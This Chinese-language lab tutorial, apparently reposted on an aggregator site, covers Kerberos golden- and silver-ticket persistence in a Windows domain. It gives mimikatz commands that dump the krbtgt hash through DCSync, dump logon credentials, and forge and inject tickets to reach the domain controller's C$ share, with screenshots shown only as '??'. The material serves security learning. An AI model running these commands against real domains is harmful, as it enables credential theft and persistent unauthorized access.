獲得域控得用戶密碼時，為了防止密碼被改，需要進行權限維持

實驗一：黃金票據

實驗原理：ms14068的漏洞原理是偽造域管的tgt，而黃金票據的漏洞原理是偽造krbtgt用戶的票據，krbtgt用戶是域控中用來管理發放票據的用戶，擁有了該用戶的權限，就可以偽造系統中的任意用戶

實驗條件：

1.域名稱?
2.域的SID 值
3.域的KRBTGT賬戶NTLM密碼哈希或者aes-256值
4.偽造用戶名

實驗步驟：

1.獲取域名稱

whoami 或net time /domain

??

2.獲取域的sid值

whoami /all

??

3.獲取域的KRBTGT賬戶NTLM密碼哈希或者aes-256值，具體方法見：https://blog.csdn.net/cxrpty/article/details/105208831

lsadump::dcsync /domain:zz.com /user:krbtgt /csv

??

4.清楚所有票據

klist purge

??

5.使用mimikatz偽造指定用戶的票據并注入到內存

kerberos::golden /admin:administrator /domain:zz.com /sid:S-1-5-21-1373374443-4003574425-2823219550 /krbtgt:9f3af6256e86408cb31169871fb36e60 /ptt

??

6.查看票據

??

7.查看域控信息

dir \\WIN-8\c$

??

實驗二：白金票據

實驗原理：白銀票據與ms14068和黃金票據的原理不太一樣，ms14068和黃金票據都是偽造tgt（門票發放票），而白銀票據則是偽造st（門票），這樣的好處是門票不會經過kdc，從而更加隱蔽，但是偽造的門票只對部分服務起作用,如cifs（文件共享服務），mssql，winrm（windows遠程管理），dns等等

實驗要求：

1.域名
2.域sid
3.目標服務器FQDN
4.可利用的服務
5.服務賬號的NTML HASH?
6.需要偽造的用戶名

實驗步驟：

1.獲取域名及目標服務器名，方法同上

??

2.獲取域id，方法同上

??

3.利用文件共享服務cifs，獲取服務賬號得NTMLhash值(在14068基礎上使用mimikatz獲取)

注意：服務賬號就是域控名$

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> 2.txt

??

4.查看域中的所有用戶

??

5.清理所有票據

??

7.利用mimikatz對指定用戶進行票據偽裝并注入內存

kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服務賬號NTMLHASH /user:用戶名 /ptt

??

8.查看域控信息

dir \\WIN-8\c$

??

總結

以上是生活随笔為你收集整理的域权限维持——黄金票据和白金票据的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。